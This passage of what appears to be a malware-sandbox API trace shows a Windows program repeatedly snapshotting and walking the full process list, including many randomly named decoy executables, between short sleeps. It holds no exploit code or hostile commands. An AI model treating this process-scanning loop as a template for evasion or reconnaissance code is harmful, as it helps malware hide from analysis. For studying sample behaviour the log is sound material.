cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0142.641] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0142.642] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0142.643] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0142.645] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0142.646] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0142.647] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0142.648] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0142.649] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0142.650] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0142.651] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0142.653] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0142.654] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0142.704] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0142.706] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0142.707] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0142.708] CloseHandle (hObject=0xbc) returned 1 [0142.708] Sleep (dwMilliseconds=0x12c) [0143.061] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.066] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.067] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.068] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.069] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.070] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.071] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.072] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.076] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.080] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.083] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0143.085] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.086] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.088] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0143.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0143.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0143.093] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0143.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0143.095] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0143.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0143.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0143.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0143.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0143.103] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0143.104] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0143.105] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0143.106] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0143.151] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0143.152] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0143.153] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0143.154] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0143.155] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0143.156] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0143.157] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.158] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0143.160] CloseHandle (hObject=0xc4) returned 1 [0143.160] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0143.165] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.166] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.167] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.168] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.169] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.170] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.171] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0143.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.172] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.173] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.174] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.175] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.176] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.177] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, 